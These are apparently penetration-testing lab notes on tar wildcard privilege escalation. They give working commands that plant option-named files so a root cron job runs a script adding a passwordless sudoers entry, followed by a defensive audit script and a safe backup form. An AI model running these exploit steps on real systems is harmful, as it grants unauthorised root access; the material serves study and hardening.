5. Wildcard abuse

Example: tar wildcard abuse (requires vulnerable cron job)

Create malicious files

echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
echo "" > "--checkpoint-action=exec=sh root.sh"
echo "" > --checkpoint=1

Check created files

ls -la

Wait for cron job to run (check /var/log/syslog for cron job execution)

Check sudo privileges

sudo -l

If successful, escalate to root

sudo su
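
Defender's view of the steps above, as an added example that is not part of the original notes: the files only take effect when the cron job hands a bare * to tar, so names beginning with "-" are parsed as options. The function names below are hypothetical; the script audits a directory for such names and shows a backup form that uses no glob.

```shell
#!/bin/sh
# Added defensive example; function names are hypothetical.

# classify_name PATH: label a file name by how GNU tar would treat it if a
# bare "*" expanded to it. The tar-specific labels are triage only: GNU tar
# also accepts unambiguous abbreviations of long options, so every
# "option-like" name in a directory processed by a privileged job is suspect.
classify_name() {
    name=${1##*/}                      # strip any leading directory part
    case $name in
        --checkpoint-action=exec=*|--to-command=*|--use-compress-program=*)
            echo "tar-exec" ;;         # option that makes tar run a command
        --checkpoint|--checkpoint=*)
            echo "tar-checkpoint" ;;   # enables checkpoints for the action
        -*) echo "option-like" ;;      # any other leading-dash name
        *)  echo "ok" ;;
    esac
}

# audit_dir DIR: print "label<TAB>name" for every entry in DIR whose name
# starts with "-" (exactly the names a "*" would turn into options).
audit_dir() {
    for f in "$1"/-*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # glob matched nothing
        printf '%s\t%s\n' "$(classify_name "$f")" "${f##*/}"
    done
}

# safe_backup DIR OUT: archive DIR by naming the directory itself, so no
# file name ever reaches tar's option parser. OUT must live outside DIR.
# If the job has to keep a glob, "tar -cf OUT -- *" or "tar -cf OUT ./*"
# has the same effect.
safe_backup() {
    tar -cf "$2" -C "$1" .
}
```

Run audit_dir against any directory that a root cron job archives and that unprivileged users can write to; an empty result means no option-like names are present.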
